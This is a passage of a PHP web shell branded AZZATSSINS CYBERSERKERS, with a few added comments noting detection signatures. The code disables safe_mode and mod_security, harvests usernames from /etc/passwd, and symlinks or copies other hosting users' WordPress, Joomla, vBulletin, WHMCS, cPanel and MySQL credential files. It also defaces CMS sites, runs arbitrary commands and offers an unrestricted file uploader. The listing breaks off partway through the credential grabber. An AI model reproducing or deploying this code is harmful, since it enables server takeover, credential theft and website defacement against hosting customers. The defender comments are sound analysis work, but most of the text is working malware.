  1180.  
  1181. die();
  1182.  
  1183. }
  1184.  
  1185. elseif($_POST['ac'] == "chknamed"){
  1186.  
  1187. error_reporting(0);
  1188.  
  1189. if(is_readable("/etc/named.conf")){
  1190.  
  1191. $named = file_get_contents("/etc/named.conf");
  1192.  
  1193. preg_match_all('%zone \"(.*)\" {%',$named,$domains);
  1194.  
  1195. foreach($domains[1] as $domain){
  1196.  
  1197. $domain = trim($domain);
  1198.  
  1199. $i += 1;
  1200.  
  1201. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  1202.  
  1203. $dn .= "<a href='http://".$domain."'>".$domain."</a> - ".$owner['name']."<br />";
  1204.  
  1205. }
  1206.  
  1207. echo "Total Domains Found: ".$i."<br />".$dn;
  1208.  
  1209. die();
  1210.  
  1211. }
  1212.  
  1213. elseif(is_readable("/etc/valiases")){
  1214.  
  1215. $list = scandir("/etc/valiases");
  1216.  
  1217. foreach($list as $domain){
  1218.  
  1219. $i += 1;
  1220.  
  1221. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  1222.  
  1223. $dn .= "<a href='http://".$domain."'>".$domain."</a> - ".$owner['name']."<br />";
  1224.  
  1225. }
  1226.  
  1227. echo "Total Domains Found: ".$i."<br />".$dn;
  1228.  
  1229. die();
  1230.  
  1231. }
  1232.  
  1233. elseif(is_readable("/var/named")){
  1234.  
  1235. $list = scandir("/var/named");
  1236.  
  1237. foreach($list as $domain){
  1238.  
  1239. if(strpos($domain,".db")){
  1240.  
  1241. $i += 1;
  1242.  
  1243. $domain = str_replace('.db','',$domain);
  1244.  
  1245. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  1246.  
  1247. $dn .= "<a href='http://".$domain."'>".$domain."</a> - ".$owner['name']."<br />";
  1248.  
  1249. }
  1250.  
  1251. }
  1252.  
  1253. echo "Total Domains Found: ".$i."<br />".$dn;
  1254.  
  1255. die();
  1256.  
  1257. }
  1258.  
  1259. else{
  1260.  
  1261. die("'/etc/named.conf' is not readable. Try scan for public_html. (:");
  1262.  
  1263. }
  1264.  
  1265. }
  1266.  
  1267. elseif($_POST['ac'] == "safebypass"){
  1268.  
  1269. $byphp = "safe_mode = Off
  1270.  
  1271. disable_functions =
  1272. NONE
  1273.  
  1274. safe_mode_gid = OFF
  1275.  
  1276. open_basedir = OFF
  1277.  
  1278. allow_url_fopen = On";
  1279.  
  1280. $byht = "<IfModule mod_security.c>
  1281.  
  1282. SecFilterEngine Off
  1283.  
  1284. SecFilterScanPOST Off
  1285.  
  1286. SecFilterCheckURLEncoding Off
  1287.  
  1288. SecFilterCheckUnicodeEncoding Off
  1289.  
  1290. </IfModule>";
  1291.  
  1292. file_put_contents("php.ini",$byphp);
  1293.  
  1294. file_put_contents(".htaccess",$byht);
  1295.  
  1296. echo "<script>alert('Safe Mode ByPassed'); hideAll();</script>";
  1297.  
  1298. die();
  1299.  
  1300. }
  1301.  
  1302. elseif($_POST['ac'] == "chkph"){
  1303.  
  1304. if(is_readable("/etc/passwd")){
  1305.  
  1306. if(!is_dir("xyz")){
  1307.  
  1308. @mkdir('xyz',0777);
  1309.  
  1310. }
  1311.  
  1312. $htaccss = "Options all
  1313.  
  1314. DirectoryIndex AZZATSSINS.html
  1315.  
  1316. AddType text/plain .php
  1317.  
  1318. AddHandler server-parsed .php
  1319.  
  1320.  AddType text/plain .html
  1321.  
  1322. AddHandler txt .html
  1323.  
  1324. Require None
  1325.  
  1326. Satisfy Any";
  1327.  
  1328. file_put_contents("xyz/.htaccess",$htaccss);
  1329.  
  1330. $etc = file_get_contents("/etc/passwd");
  1331.  
  1332. $etcz = explode("\n",$etc);
  1333.  
  1334. foreach($etcz as $etz){
  1335.  
  1336. $etcc = explode(":",$etz);
  1337.  
  1338. error_reporting(0);
  1339.  
  1340. if($enable_wp){
  1341.  
  1342. symlink('/home/'.$etcc[0].'/public_html/wp-config.php',"xyz/".$etcc[0].'-WordPress.txt');
  1343.  
  1344. symlink('/home/'.$etcc[0].'/public_html/blog/wp-config.php',"xyz/".$etcc[0].'-WordPress.txt');
  1345.  
  1346. symlink('/home/'.$etcc[0].'/public_html/wp/wp-config.php',"xyz/".$etcc[0].'-WordPress.txt');
  1347.  
  1348. }
  1349.  
  1350. if($enable_phpbb){
  1351.  
  1352. symlink('/home/'.$etcc[0].'/public_html/config.php',"xyz/".$etcc[0].'-PhpBB.txt');
  1353.  
  1354. }
  1355.  
  1356. if($enable_vb){
  1357.  
  1358. symlink('/home/'.$etcc[0].'/public_html/includes/config.php',"xyz/".$etcc[0].'-vBulletin.txt');
  1359.  
  1360. }
  1361.  
  1362. if($enable_joomla){
  1363.  
  1364. symlink('/home/'.$etcc[0].'/public_html/configuration.php',"xyz/".$etcc[0].'-Joomla.txt');
  1365.  
  1366. symlink('/home/'.$etcc[0].'/public_html/web/configuration.php',"xyz/".$etcc[0].'-Joomla.txt');
  1367.  
  1368. symlink('/home/'.$etcc[0].'/public_html/site/configuration.php',"xyz/".$etcc[0].'-Joomla.txt');
  1369.  
  1370. }
  1371.  
  1372. }
  1373.  
  1374. $lol = explode("/",curPageURL());
  1375.  
  1376. $link = str_replace(end($lol),"",curPageURL());
  1377.  
  1378. $str = file_get_contents($link."/xyz");
  1379.  
  1380. preg_match_all('%\w \w{4}=(\"|\')(.*)\.txt(\"|\')%',$str,$exp);
  1381.  
  1382. if(is_array($exp[2])){
  1383.  
  1384. $q = 2;
  1385.  
  1386. $dmn = getDnamed();
  1387.  
  1388. foreach($exp[2] as $sitez){
  1389.  
  1390. if($q == 2){$q = 1;}else{$q = 2;}
  1391.  
  1392. $j += 1;
  1393.  
  1394. $sn = explode("-",$sitez);
  1395.  
  1396. $domain = $dmn[$sn[0]];
  1397.  
  1398. if($domain){
  1399.  
  1400. $domain = "<a id='inj_dom".$j."' href='http://".$domain."'>".$domain."</a>";
  1401.  
  1402. }else{
  1403.  
  1404. $domain = "<a id='inj_dom".$j."' href=''>...</a>";
  1405.  
  1406. }
  1407.  
  1408. $nan .= '<div id="inj'.$j.'">
  1409.  
  1410. <div class="tblbx'.$q.'" style="width:200px;cursor:pointer;background-color:#76BBEB;" id="injc'.$j.'"onClick="doToggle(\''.$j.'\');">'.$sn[0].'<input style="display:none;" type="checkbox" id="injchk'.$j.'" checked></div>
  1411.  
  1412. <div class="tblbx'.$q.'" style="width:220px;" id="inj_domain'.$j.'">'.$domain.'</div>
  1413.  
  1414. <div class="tblbx'.$q.'" style="width:160px;"><a id="injst'.$j.'" class="conf" href="'.$link.'xyz/'.$sitez.'.txt" title="'.$j.'">'.ucfirst($sn[1]).'</a></div>
  1415.  
  1416. <div class="tblbx'.$q.'" style="width:120px;" id="inj_status'.$j.'" title="On Process...">Process...</div>
  1417.  
  1418. </div>';
  1419.  
  1420. }
  1421.  
  1422. $cnt = '<input type="text" style="display:none" id="sitecount" value="'.$j.'">';
  1423.  
  1424. echo $nan.$cnt;
  1425.  
  1426. }
  1427.  
  1428. }
  1429.  
  1430. die();
  1431.  
  1432. }
  1433.  
  1434. elseif($_POST['ac'] == "chkph2"){
  1435.  
  1436. if(is_readable("/etc/passwd")){
  1437.  
  1438. if(!is_dir("xyz")){
  1439.  
  1440. @mkdir('xyz',0777);
  1441.  
  1442. }
  1443.  
  1444. if(!is_link("xyz/root")){
  1445.  
  1446. $sym = symlink("/","xyz/root");
  1447.  
  1448. if(!$sym){
  1449.  
  1450. die("Symlink method failed.");
  1451.  
  1452. }
  1453.  
  1454. }
  1455.  
  1456. $htaccss = "Options all
  1457.  
  1458. DirectoryIndex AZZATSSINS.html
  1459.  
  1460. AddType text/plain .php
  1461.  
  1462. AddHandler server-parsed .php
  1463.  
  1464.  AddType text/plain .html
  1465.  
  1466. AddHandler txt .html
  1467.  
  1468. Require None
  1469.  
  1470. Satisfy Any";
  1471.  
  1472. file_put_contents("xyz/.htaccess",$htaccss);
  1473.  
  1474. $etc = file_get_contents("/etc/passwd");
  1475.  
  1476. $etcz = explode("\n",$etc);
  1477.  
  1478. $lol = explode("/",curPageURL());
  1479.  
  1480. $link = str_replace(end($lol),"",curPageURL());
  1481.  
  1482. @unlink("rootinject.tmp");
  1483.  
  1484. $q = 2;
  1485.  
  1486. $dmn = getDnamed();
  1487.  
  1488. foreach($etcz as $etz){
  1489.  
  1490. $etcc = explode(":",$etz);
  1491.  
  1492. $dr = "xyz/root/home/".$etcc[0]."/public_html/";
  1493.  
  1494. $dan = chkSys($link.$dr);
  1495.  
  1496. if($dan){
  1497.  
  1498. if($q == 2){$q = 1;}else{$q = 2;}
  1499.  
  1500. $domain = $dmn[$etcc[0]];
  1501.  
  1502. if($domain){
  1503.  
  1504. $domain = "<a id='inj_dom".$k."' href='http://".$domain."'>".$domain."</a>";
  1505.  
  1506. }else{
  1507.  
  1508. $domain = "<a id='inj_dom".$k."' href=''>...</a>";
  1509.  
  1510. }
  1511.  
  1512. $k += 1;
  1513.  
  1514. $nant = '<div id="inj'.$k.'">
  1515.  
  1516. <div class="tblbx'.$q.'" style="width:200px;cursor:pointer;background-color:#76BBEB;" id="injc'.$k.'"onClick="doToggle(\''.$k.'\');">'.$etcc[0].'<input style="display:none;" type="checkbox" id="injchk'.$k.'" checked></div>
  1517.  
  1518. <div class="tblbx'.$q.'" style="width:220px;" id="inj_domain'.$k.'">'.$domain.'</div>
  1519.  
  1520. <div class="tblbx'.$q.'" style="width:160px;"><a class="conf" href="'.$dan['link'].'">'.$dan['cms'].'</a></div>
  1521.  
  1522. <div class="tblbx'.$q.'" style="width:120px;" id="inj_status'.$k.'">Process...</div>
  1523.  
  1524. </div>';
  1525.  
  1526. file_put_contents("rootinject.tmp",$nant,FILE_APPEND);
  1527.  
  1528. $nan .= $nant;
  1529.  
  1530. }
  1531.  
  1532. }
  1533.  
  1534. $cnt = '<input type="text" style="display:none" id="sitecount" value="'.$k.'">';
  1535.  
  1536. echo $nan.$cnt;
  1537.  
  1538. }
  1539.  
  1540. die();
  1541.  
  1542. }
  1543.  
  1544. elseif($_POST['ac'] == "inject"){
  1545.  
  1546. error_reporting(0);
  1547.  
  1548. $cms = strtolower($_POST['cms']);
  1549.  
  1550. $cnf = $_POST['conf'];
  1551.  
  1552. if(file_exists(md5($_POST['deface_page']))){
  1553.  
  1554. $html = file_get_contents(md5($_POST['deface_page']));
  1555.  
  1556. }else{
  1557.  
  1558. $html = file_get_contents($_POST['deface_page']);
  1559.  
  1560. file_put_contents(md5($_POST['deface_page']),$html);
  1561.  
  1562. file_put_contents("azzatssins.html",$html);
  1563.  
  1564. }
  1565.  
  1566. if(!is_dir("cookie")){
  1567.  
  1568. @mkdir("cookie",0777);
  1569.  
  1570. }
  1571.  
  1572. switch($cms){
  1573.  
  1574. case "wordpress":
  1575.  
  1576. doXploitWP($cnf,$html,"azzatssins");
  1577.  
  1578. break;
  1579.  
  1580. case "joomla":
  1581.  
  1582. doXploitJM($cnf,$html,"azzatssins");
  1583.  
  1584. break;
  1585.  
  1586. case "vbulletin":
  1587.  
  1588. doXploitVB($cnf,$html);
  1589.  
  1590. break;
  1591.  
  1592. case "phpbb":
  1593.  
  1594. break;
  1595.  
  1596. case "ipb":
  1597.  
  1598. break;
  1599.  
  1600. case "mybb":
  1601.  
  1602. break;
  1603.  
  1604. case "oscommerce":
  1605.  
  1606. break;
  1607.  
  1608. case "smf":
  1609.  
  1610. break;
  1611.  
  1612. case "drupal":
  1613.  
  1614. break;
  1615.  
  1616. case "seditio":
  1617.  
  1618. break;
  1619.  
  1620. case "e107":
  1621.  
  1622. break;
  1623.  
  1624. }
  1625.  
  1626. throwErr("Not Added");
  1627.  
  1628. }
  1629.  
  1630. elseif($_POST['ac'] == "ssh"){
  1631.  
  1632. $ssh = exme($_POST['command']);
  1633.  
  1634. die(nl2br($ssh));
  1635.  
  1636. }
  1637.  
  1638. elseif($_POST['ac'] == "phpinfo"){
  1639.  
  1640. $php = phpinfo();
  1641.  
  1642. die($php);
  1643.  
  1644. }
  1645.  
  // Renders the shell's page chrome: <html> head, inline CSS and the opening of <body>.
  // The leading `;` is an empty statement that terminates the preceding if/elseif chain
  // (that chain starts outside this view). Everything up to the closing ' on the last
  // line is a single string literal, so nothing in here is executed server-side.
  // Defender notes (detection): the static strings below are stable signatures of this
  // shell — the <title> ".: !- GO A HEAD AND TRY TO STOP ME -! :." and the meta
  // description/keywords naming AZZATSSINS CYBERSERKERS. A browser rendering this page
  // also fetches jQuery from code.jquery.com and background images from azzat.wap.mu
  // and i.imgur.com, which shows up in proxy/DNS logs of whoever opened the shell.
  // Markup quirk: <body> is opened twice (once before <style>, once after it).
  1646. ;echo '<html>
  1647.  
  1648. <meta content="Simple WebShell AZZATSSINS CYBERSERKERS" name="description"/>
  1649. <meta content="AZZATSSINS SHELL 2016, BCA SHELL RECODED BY AZZATSSINS, LINUX WEBSHELL, CYBERSERKERS WRBSHELL, SIMPLE WEBSHELL, AZZATSSINS CYBERSERKERS, SHIKI ASURA, P1N0CH10, CAZZTER, AZZTCHER, COOL WEBSHELL, HACKED BY AZZATSSINS, AZZATSSINS WAS HERE" name="keywords"/>
  1650. <title>.: !- GO A HEAD AND TRY TO STOP ME -! :.</title>
  1651.  
  1652. <head>
  1653.  
  1654. <script src="http://code.jquery.com/jquery-latest.min.js"></script>
  1655.  
  1656. </head>
  1657.  
  1658. <body bgcolor="black" background="http://azzat.wap.mu/files/1049320/AZZATSSINS.png">
  1659.  
  1660. <style>
  1661.  
  1662. body{
  1663.  
  1664. font-family: "courier new";
  1665.  
  1666. background-color: black;
  1667.  
  1668. font-size:80%;
  1669.  
  1670. color: #28FE14;
  1671.  
  1672. background-image: url("http://i.imgur.com/zHNCk2e.gif");
  1673.  
  1674. }
  1675.  
  1676. #sysinfo{
  1677.  
  1678. border: 1px solid #28FE14;
  1679.  
  1680. position:fixed;
  1681.  
  1682. padding:2px;
  1683.  
  1684. top:1px;
  1685.  
  1686. left:1px;
  1687.  
  1688. background-color: black;
  1689.  
  1690. font-size:12px;
  1691.  
  1692. }
  1693.  
  1694. #phpinfo{
  1695.  
  1696. border: 1px solid #28FE14;
  1697.  
  1698. position:fixed;
  1699.  
  1700. padding:2px;
  1701.  
  1702. top:1px;
  1703.  
  1704. right:1px;
  1705.  
  1706. background-color: black;
  1707.  
  1708. font-size:12px;
  1709.  
  1710. }
  1711.  
  1712. #status{
  1713.  
  1714. border: 1px solid #28FE14;
  1715.  
  1716. position:fixed;
  1717.  
  1718. padding:2px;
  1719.  
  1720. bottom:1px;
  1721.  
  1722. right:1px;
  1723.  
  1724. background-color: black;
  1725.  
  1726. font-size:12px;
  1727.  
  1728. }
  1729.  
  1730. #infobox{
  1731.  
  1732. z-index:1;
  1733.  
  1734. border: 1px solid white;
  1735.  
  1736. margin-left:auto;
  1737.  
  1738. margin-right:auto;
  1739.  
  1740. margin-top:50px;
  1741.  
  1742. width:600px;
  1743.  
  1744. background-color: black;
  1745.  
  1746. font-size:12px;
  1747.  
  1748. }
  1749.  
  1750. .infotitle{
  1751.  
  1752. padding:4px;
  1753.  
  1754. background-color: white;
  1755.  
  1756. color: black;
  1757.  
  1758. font-family: Thaoma;
  1759.  
  1760. font-size:14px;
  1761.  
  1762. }
  1763.  
  1764. .infotxt{
  1765.  
  1766. padding:5px;
  1767.  
  1768. }
  1769.  
  1770.  
  1771.  
  1772. .sidebar{
  1773.  
  1774. position:fixed;
  1775.  
  1776. left:1px;
  1777.  
  1778. top:30%;
  1779.  
  1780. }
  1781.  
  1782. .stitle{
  1783.  
  1784. float:left;
  1785.  
  1786. cursor:pointer;
  1787.  
  1788. padding:7px;
  1789.  
  1790. color:black;
  1791.  
  1792. background-color: white;
  1793.  
  1794. }
  1795.  
  1796. .stitle:hover{
  1797.  
  1798. color:red;
  1799.  
  1800. }
  1801.  
  1802. .smnu{
  1803.  
  1804. display:none;
  1805.  
  1806. background-color: black;
  1807.  
  1808. padding:5px;
  1809.  
  1810. border: 1px solid white;
  1811.  
  1812. float:left;
  1813.  
  1814. }
  1815.  
  1816. a{
  1817.  
  1818. color: #df5;
  1819.  
  1820. text-decoration: none;
  1821.  
  1822. }
  1823.  
  1824. a:hover{
  1825.  
  1826. color:white;
  1827.  
  1828. }
  1829.  
  1830. .copyright{
  1831.  
  1832. position:fixed;
  1833.  
  1834. bottom:1px;
  1835.  
  1836. left:1px;
  1837.  
  1838. padding:2px;
  1839.  
  1840. }
  1841.  
  1842. .logo{
  1843.  
  1844. margin:auto;
  1845.  
  1846. width:600px;
  1847.  
  1848. height:600px;
  1849.  
  1850. background-image: url("");
  1851.  
  1852. }
  1853.  
  1854. .filetable{
  1855.  
  1856. margin-top:2px;
  1857.  
  1858. width:740px;
  1859.  
  1860. }
  1861.  
  1862. .tblcnt{
  1863.  
  1864. text-align: center;
  1865.  
  1866. margin-left:2px;
  1867.  
  1868. color:black;
  1869.  
  1870. background-color: white;
  1871.  
  1872. padding:3px;
  1873.  
  1874. float:left;
  1875.  
  1876. border: 1px solid white;
  1877.  
  1878. }
  1879.  
  1880. .tblbx1{
  1881.  
  1882. height:12px;
  1883.  
  1884. text-align: center;
  1885.  
  1886. margin-left:2px;
  1887.  
  1888. color:white;
  1889.  
  1890. background-color: #333333;
  1891.  
  1892. padding:3px;
  1893.  
  1894. float:left;
  1895.  
  1896. border: 1px solid #333333;
  1897.  
  1898. }
  1899.  
  1900. .tblbx2{
  1901.  
  1902. height:12px;
  1903.  
  1904. text-align: center;
  1905.  
  1906. margin-left:2px;
  1907.  
  1908. color:white;
  1909.  
  1910. background-color: #444444;
  1911.  
  1912. padding:3px;
  1913.  
  1914. float:left;
  1915.  
  1916. border: 1px solid #444444;
  1917.  
  1918. }
  1919.  
  1920.  
  1921.  
  1922. .tbl{
  1923.  
  1924. margin-top:100px;
  1925.  
  1926. padding-top:2px;
  1927.  
  1928. padding-bottom: 2px;
  1929.  
  1930. margin:auto;
  1931.  
  1932. width:742px;
  1933.  
  1934. border: 1px solid white;
  1935.  
  1936. }
  1937.  
  1938. .rbox{
  1939.  
  1940. float:left;
  1941.  
  1942. border: 1px solid #28FE14;
  1943.  
  1944. padding:10px;
  1945.  
  1946. }
  1947.  
  1948. .smit{
  1949.  
  1950. background-color: black;
  1951.  
  1952. color: #28FE14;
  1953.  
  1954. }
  1955.  
  1956. .sshbox{
  1957.  
  1958. display:none;
  1959.  
  1960. padding-left:7px;
  1961.  
  1962. width:600px;
  1963.  
  1964. height:400px;
  1965.  
  1966. margin: auto;
  1967.  
  1968. margin-top:80px;
  1969.  
  1970. -webkit-border-radius: 10px;
  1971.  
  1972. -moz-border-radius: 10px;
  1973.  
  1974. border-radius: 10px;
  1975.  
  1976. border:3px solid #FFF5F5;
  1977.  
  1978. background-color:#080500;
  1979.  
  1980. overflow:auto;
  1981.  
  1982. }
  1983.  
  1984. #sshcmd{
  1985.  
  1986. width:450px;
  1987.  
  1988. background-color: #080500;
  1989.  
  1990. color:#28FE14;
  1991.  
  1992. border:none;
  1993.  
  1994. }
  1995.  
  1996.  
  1997.  
  1998. </style>
  1999.  
  2000. <body>
  2001.  
  2002. <div class="logo" id="logo"></div>
  2003.  
  2004. <div id="sysinfo"><strong>OS:</strong> ';echo php_uname("s")." - ".php_uname("r")." /  ".php_uname("m");;echo '</div>
  2005.  
  2006.  
  2007.  
  2008. <div id="phpinfo"> ';
  2009.  
  // Fills the #phpinfo box opened by the preceding echo: the first space-separated
  // token of SERVER_SOFTWARE, the PHP version, then a coloured safe_mode indicator.
  // Note: SERVER_SOFTWARE is echoed into HTML without htmlspecialchars(); the value
  // comes from the web server, not the request, so this is a hygiene issue rather
  // than a request-controlled injection point.
  2010. $srvsoft = explode(" ",$_SERVER['SERVER_SOFTWARE']);
  2011.  
  2012. echo $srvsoft[0];
  2013.  
  2014. echo " PHP ".phpversion();
  2015.  
  // The else branch is taken for any falsy ini_get() result, i.e. when the
  // safe_mode directive is off or unknown to the running PHP build.
  2016. if( ini_get('safe_mode') ){
  2017.  
  2018. echo " <font color='red'>Safe Mode On</font>";
  2019.  
  2020. }else{
  2021.  
  2022. echo " <font color='blue'>Safe Mode Off</font>";
  2023.  
  2024. }
  2025.  
  2026. ;echo '</div>
  2027. ';
  2028.  
  // Upload form and its handler, reachable only when the query string carries file=uploader.
  // Defender notes (risk): the destination is $_POST['uploadto'] . '/' . $_FILES['file']['name'] with
  // no path normalisation, extension allow-list or size limit, so both directory and filename are
  // request-controlled; the form prefills 'uploadto' with getcwd(). The @ on copy() suppresses the
  // warning a failed write would otherwise produce, so the only trace of a failure is the HTML
  // "Upload failed!" text. On success the raw filename is reflected into the page unescaped.
  2029. if($_GET['file']=="uploader"){ echo '<center><br><br><br><form method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  2030.  echo '<input name="uploadto" type="text" size="30" value="'.getcwd().'"><br />';
  2031.  echo '<input type="file" name="file" size="30"><input name="_upl" type="submit" id="_upl" value="Upload"></form></center>';
  2032.  if( $_POST['_upl'] == "Upload" ) {
  2033.  if(@copy($_FILES['file']['tmp_name'], $_POST['uploadto'].'/'.$_FILES['file']['name'])) {
  2034.  echo '<center><b><a href="'.$_FILES['file']['name'].'">Upload success!</a></b></center><br>'.$_POST['uploadto']."/".$_FILES['file']['name'];
  2035. } else {
  2036. echo '<center><b><a href=http://fb.me/AZZATSSINS.CYBERSERKERS>Upload failed!</a></b></center>'; }
  2037. }}
  2038.  
  2039. if($_GET['config']=="grabber"){
  2040.  ?>
  2041. <title>ConfiGrabber V3.2 by AZZATSSINS</title><body bgcolor=silver><center><div style=background:black;margin:0px;padding:4px;text-align:center;color:silver;><i><b><font color=lime>&copy; </font><a href=mailto:cyberserkers@gmail.com>AZZATSSINS CYBERSERKERS</a></b></i></div><br><br><br><form method="post"><input type="hidden" cols="100" rows="100" name="passwd" value="<?php $usr=file("/etc/passwd"); foreach($usr as $usrr) { $str=explode(":",$usrr); echo $str[0]."\n"; } ?>
  2042. "><br>Your Folder  : <input type="text" class="input" name="folfig" size="10" value="CONFIGRAB">
  2043. <input style="background:dodgerblue;margin:0px;width:15%;padding:0px;color:#fff;border:0;font-weight:bold;" name="conf" class="ipt" value="EXECUTE" type="submit"><br><br></form></center>
  2044. <?php @ini_set('html_errors',0); @ini_set('max_execution_time',0); @ini_set('display_errors', 0); @ini_set('file_uploads',1);
  2045. if ($_POST['conf']) {
  2046. $folfig = $_POST['folfig'];
  2047. $functions=@ini_get("disable_functions"); if(eregi("symlink",$functions)){die ('<font color=red>Symlnk Has Been Disable...!!!</font>');}
  2048. @mkdir($folfig, 0755);
  2049. @chdir($folfig);
  2050. $htaccess="Options Indexes FollowSymLinks\nDirectoryIndex azzatssins.cyberserkers\nAddType txt .php\nAddHandler txt .php";
  2051. file_put_contents(".htaccess",$htaccess,FILE_APPEND);
  2052. $passwd=explode("\n",$_POST["passwd"]);
  2053. foreach($passwd as $pwd){ $user=trim($pwd);
  2054. symlink('/','000~ROOT~000');
  2055. copy('/home/'.$user.'/.my.cnf',$user.' <~ CPANEL');
  2056. symlink('/home/'.$user.'/.my.cnf',$user.' <~ CPANEL');
  2057. copy('/home/'.$user.'/.accesshash',$user.' <~ WHMCS.txt');
  2058. symlink('/home/'.$user.'/.accesshash',$user.' <~ WHMCS.txt');
  2059. copy('/home/'.$user.'/public_html/suspended.page/index.html',$user.' <~ RESELLER.txt');
  2060. symlink('/home/'.$user.'/public_html/suspended.page/index.html',$user.' <~ RESELLER.txt');
  2061. symlink('/home/'.$user.'/public_html/.accesshash',$user.' <~ RESELLER.txt');
  2062. copy('/home/'.$user.'/public_html/wp-config.php',$user.' <~ WORDPRESS.txt');
  2063. copy('/home/'.$user.'/public_html/configuration.php',$user.' <~ WHMCS or JOOMLA.txt');
  2064. copy('/home/'.$user.'/public_html/account/configuration.php',$user.' <~ WHMCS.txt');
  2065. copy('/home/'.$user.'/public_html/accounts/configuration.php',$user.' <~ WHMCS.txt');
  2066. copy('/home/'.$user.'/public_html/buy/configuration.php',$user.' <~ WHMCS.txt');
  2067. copy('/home/'.$user.'/public_html/checkout/configuration.php',$user.' <~ WHMCS.txt');
  2068. copy('/home/'.$user.'/public_html/central/configuration.php',$user.' <~ WHMCS.txt');
  2069. copy('/home/'.$user.'/public_html/clienti/configuration.php',$user.' <~ WHMCS.txt');
  2070. copy('/home/'.$user.'/public_html/client/configuration.php',$user.' <~ WHMCS.txt');
  2071. copy('/home/'.$user.'/public_html/cliente/configuration.php',$user.' <~ WHMCS.txt');
  2072. copy('/home/'.$user.'/public_html/clientes/configuration.php',$user.' <~ WHMCS.txt');
  2073. copy('/home/'.$user.'/public_html/clients/configuration.php',$user.' <~ WHMCS.txt');
  2074. copy('/home/'.$user.'/public_html/clientarea/configuration.php',$user.' <~ WHMCS.txt');
  2075. copy('/home/'.$user.'/public_html/clientsarea/configuration.php',$user.' <~ WHMCS.txt');
  2076. copy('/home/'.$user.'/public_html/client-area/configuration.php',$user.' <~ WHMCS.txt');
  2077. copy('/home/'.$user.'/public_html/clients-area/configuration.php',$user.' <~ WHMCS.txt');
  2078. copy('/home/'.$user.'/public_html/clientzone/configuration.php',$user.' <~ WHMCS.txt');
  2079. copy('/home/'.$user.'/public_html/client-zone/configuration.php',$user.' <~ WHMCS.txt');
  2080. copy('/home/'.$user.'/public_html/core/configuration.php',$user.' <~ WHMCS.txt');
  2081. copy('/home/'.$user.'/public_html/company/configuration.php',$user.' <~ WHMCS.txt');
  2082. copy('/home/'.$user.'/public_html/customer/configuration.php',$user.' <~ WHMCS.txt');
  2083. copy('/home/'.$user.'/public_html/customers/configuration.php',$user.' <~ WHMCS.txt');
  2084. copy('/home/'.$user.'/public_html/bill/configuration.php',$user.' <~ WHMCS.txt');
  2085. copy('/home/'.$user.'/public_html/billing/configuration.php',$user.' <~ WHMCS.txt');
  2086. copy('/home/'.$user.'/public_html/finance/configuration.php',$user.' <~ WHMCS.txt');
  2087. copy('/home/'.$user.'/public_html/financeiro/configuration.php',$user.' <~ WHMCS.txt');
  2088. copy('/home/'.$user.'/public_html/host/configuration.php',$user.' <~ WHMCS.txt');
  2089. copy('/home/'.$user.'/public_html/hosts/configuration.php',$user.' <~ WHMCS.txt');
  2090. copy('/home/'.$user.'/public_html/hosting/configuration.php',$user.' <~ WHMCS.txt');
  2091. copy('/home/'.$user.'/public_html/hostings/configuration.php',$user.' <~ WHMCS.txt');
  2092. copy('/home/'.$user.'/public_html/klien/configuration.php',$user.' <~ WHMCS.txt');
  2093. copy('/home/'.$user.'/public_html/manage/configuration.php',$user.' <~ WHMCS.txt');
  2094. copy('/home/'.$user.'/public_html/manager/configuration.php',$user.' <~ WHMCS.txt');
  2095. copy('/home/'.$user.'/public_html/member/configuration.php',$user.' <~ WHMCS.txt');
  2096. copy('/home/'.$user.'/public_html/members/configuration.php',$user.' <~ WHMCS.txt');
  2097. copy('/home/'.$user.'/public_html/my/configuration.php',$user.' <~ WHMCS.txt');
  2098. copy('/home/'.$user.'/public_html/myaccount/configuration.php',$user.' <~ WHMCS.txt');
  2099. copy('/home/'.$user.'/public_html/my-account/client/configuration.php',$user.' <~ WHMCS.txt');
  2100. copy('/home/'.$user.'/public_html/myaccounts/configuration.php',$user.' <~ WHMCS.txt');
  2101. copy('/home/'.$user.'/public_html/my-accounts/configuration.php',$user.' <~ WHMCS.txt');
  2102. copy('/home/'.$user.'/public_html/order/configuration.php',$user.' <~ WHMCS.txt');
  2103. copy('/home/'.$user.'/public_html/orders/configuration.php',$user.' <~ WHMCS.txt');
  2104. copy('/home/'.$user.'/public_html/painel/configuration.php',$user.' <~ WHMCS.txt');
  2105. copy('/home/'.$user.'/public_html/panel/configuration.php',$user.' <~ WHMCS.txt');
  2106. copy('/home/'.$user.'/public_html/panels/configuration.php',$user.' <~ WHMCS.txt');
  2107. copy('/home/'.$user.'/public_html/portal/configuration.php',$user.' <~ WHMCS.txt');
  2108. copy('/home/'.$user.'/public_html/portals/configuration.php',$user.' <~ WHMCS.txt');
  2109. copy('/home/'.$user.'/public_html/purchase/configuration.php',$user.' <~ WHMCS.txt');
  2110.  
  2111. copy('/home/'.$user.'/public_html/secure/configuration.php',$user.' <~ WHMCS.txt');
  2112. copy('/home/'.$user.'/public_html/support/configuration.php',$user.' <~ WHMCS.txt');
  2113. copy('/home/'.$user.'/public_html/supporte/configuration.php',$user.' <~ WHMCS.txt');
  2114. copy('/home/'.$user.'/public_html/supports/configuration.php',$user.' <~ WHMCS.txt');
  2115. copy('/home/'.$user.'/public_html/web/configuration.php',$user.' <~ WHMCS.txt');
  2116. copy('/home/'.$user.'/public_html/webhost/configuration.php',$user.' <~ WHMCS.txt');
  2117. copy('/home/'.$user.'/public_html/webhosting/configuration.php',$user.' <~ WHMCS.txt');
  2118. copy('/home/'.$user.'/public_html/whm/configuration.php',$user.' <~ WHMCS.txt');
  2119. copy('/home/'.$user.'/public_html/whmcs/configuration.php',$user.' <~ WHMCS.txt');
  2120. copy('/home/'.$user.'/public_html/whmcs2/configuration.php',$user.' <~ WHMCS.txt');
  2121. copy('/home/'.$user.'/public_html/Whm/configuration.php',$user.' <~ WHMCS.txt');
  2122. copy('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.' <~ WHMCS.txt');
  2123. copy('/home/'.$user.'/public_html/WHM/configuration.php',$user.' <~ WHMCS.txt');
  2124. copy('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.' <~ WHMCS.txt');
  2125. symlink('/home/'.$user.'/public_html/wp-config.php',$user.' <~ WORDPRESS.txt');
  2126. symlink('/home/'.$user.'/public_html/configuration.php',$user.' <~ WHMCS or JOOMLA.txt');
  2127. symlink('/home/'.$user.'/public_html/account/configuration.php',$user.' <~ WHMCS.txt');
